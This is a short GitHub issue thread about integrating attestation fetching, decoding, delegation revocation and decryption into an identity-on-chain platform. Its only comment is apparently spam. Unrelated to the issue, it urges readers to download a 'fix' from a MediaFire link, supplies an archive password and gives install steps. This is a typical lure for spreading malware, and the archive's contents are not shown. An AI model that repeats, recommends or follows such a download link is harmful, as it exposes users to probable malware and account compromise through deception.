### ISSUE TITLE
Identifiers Integration & fixtures

### ISSUE THREAD

**Issue by mehdi-torabiv** [TogetherCrew/identity-on-chain-platform#46]
[tasklist]
### Tasks
- [ ] Integrate GraphQL to fetch attestations from the blockchain network.
- [ ] Decode attestations to retrieve provider data based on the response.
- [ ] Integrate APIs for revoking delegation.
- [ ] Integrate decryption of attestation secrets.
- [ ] Update the linking identifier API.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
